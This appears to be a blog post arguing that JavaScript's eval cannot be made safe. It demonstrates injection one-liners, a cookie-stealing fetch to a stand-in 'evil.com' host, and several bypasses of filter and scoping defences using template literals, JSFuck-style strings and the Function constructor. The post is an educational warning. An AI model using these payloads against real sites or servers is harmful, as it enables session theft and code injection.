Published on

(Un)safe code evaluation in JavaScript

Let's talk about eval in JavaScript.

You probably have heard about it. If not, the MDN documentation will tell you all you want to know. In short, it is a function that tries to evaluate a string as JavaScript code.

If this sounds dangerous to you, then you are right. It is! If an attacker can control the string that you pass into this function, he can basically do anything he desires. That reaches from XSS attacks in the browser to server-side injection attacks in Node.js. 😱

Here are some one-liners to break stuff:

eval("process.kill(0)");
Kill the current process in Node.js.
eval("document.body.innerHTML=''");
Erase all visible content on any web page.

If the website under attack doesn't have any type of CSP, we could even steal the users cookies with one line of code by making a request to a website under our control: 

eval("fetch('https://evil.com?v=' + document.cookie)")
So here's the question: Can we make it safe to use eval? Let's go with our first example where we kill the current node process.

Our first idea might be something like searching the string for brackets to avoid function invocation: 

const code = "process.kill(0);";

if (/\(|\)/.test(code)) {
  throw new Error("Invalid code!");
}

eval(code);

This works for the given code. But we can easily bypass this by using template literals: 

const code = "process.kill`0`;";

if (/\(|\)/.test(code)) {
  throw new Error("Invalid code!");
}

eval(code);

No more brackets, function execution none the less. 😕

Well then why don't we just search for the word kill inside the string of code? 

const code = "process.kill(0);";

if (/kill/.test(code)) {
  throw new Error("Invalid code!");
}

eval(code);

Now we will be safe, right? Not exactly. It turns out that there are countless ways to write kill without actually writing the exact string.

You can actually write anything (and also evaluate anything) using just the six characters (, ), [, ], ! and +. Check out JSFuck for a demo!

Let's apply this here and use the fact that running (![]+[])[!+[]+!+[]] will return the string l: 

const code = "process['kil' + (![]+[])[!+[]+!+[]]](0);";

if (/\(|\)/.test(code)) {
  throw new Error("Invalid code!");
}

eval(code);

Again, security check bypassed! 😕 😢

So let's give up on trying to search the string for bad code. Let's do something more clever! If we don't want the code to access the process object, then why don't we "override" it. So that we don't actually override it we use a IIFE, taking advantage of JavaScripts lexical scoping. (That means that the process variable defined inside the function will not override the global object, but rather replace it for the scope of the current function.) 

const code = "process.kill(0);";

(() => {
  const process = {};
  eval(code);
})()

If we run this code we will get an error, stating that process.kill is not a function. (Indeed it isn't, because it is just undefined!) Perfect, right?

Well, as you might have guesses there is a way to get around this, too. For this we will use the Function constructor. It kind of works like eval, in the sense that it accepts a string which will be evaluated each time the resulting function is called.

But there is a subtle difference. When we define a function using the constructor, the function doesn't create its own closure. The function will always be executed within the global scope! (This behaviour can also be found in the documentation.)

We can use this to break free of the closure of the IIFE. That means we should be able to access the global process object again. Let's try it out: 

const code = "Function('process.exit(0)')()";

(() => {
  const process = {};
  eval(code);
})()

We also cracked this one! 😕 😢 😰

But what if we also override the Function object as well? Won't this save our problem? 

const code = "Function('process.exit(0)')()";

(() => {
  const Function = {};
  const process = {};
  eval(code);
})()

Yes, it prevents this exact code from executing. But like it was the case with strings before, we can get access to the Function constructor in a countless number of ways in JavaScript. It is as easy as accessing the constructor property of a variable that is a function. To give you some impressions, all of those expressions are true: 

(() => {}).constructor === Function;
String.constructor === Function;
(0).constructor.constructor === Function;
true.constructor.constructor === Function;
[].constructor.constructor === Function;
process.constructor.constructor === Function;

We can just choose one of those and we will make our exploit work again: 

const code = "[].constructor.constructor('process.exit(0)')()";

(() => {
  const Function = {};
  const process = {};
  eval(code);
})()

Secure code evaluation no more... 😕 😢 😰 😭

In the end I'm not a security export and still I can come up with quite simple ideas to bypass many of those checks. (I always wonder what professional hackers could come up with...)

Maybe I'm wrong after all and there is a way to make code evaluation bullet proof. If so then please let me know! 😉

If you make it this far, my message should be clear: Don't use eval to evaluate code or Function to create functions, if the string you pass in there is not 100% controlled by you!

In fact setTimeout and setInterval are just as dangerous. The first argument doesn't have to be a function, is can also be a string! This string will then be evaluated after the timeout or after each interval.

Stay safe and have fun! 🎉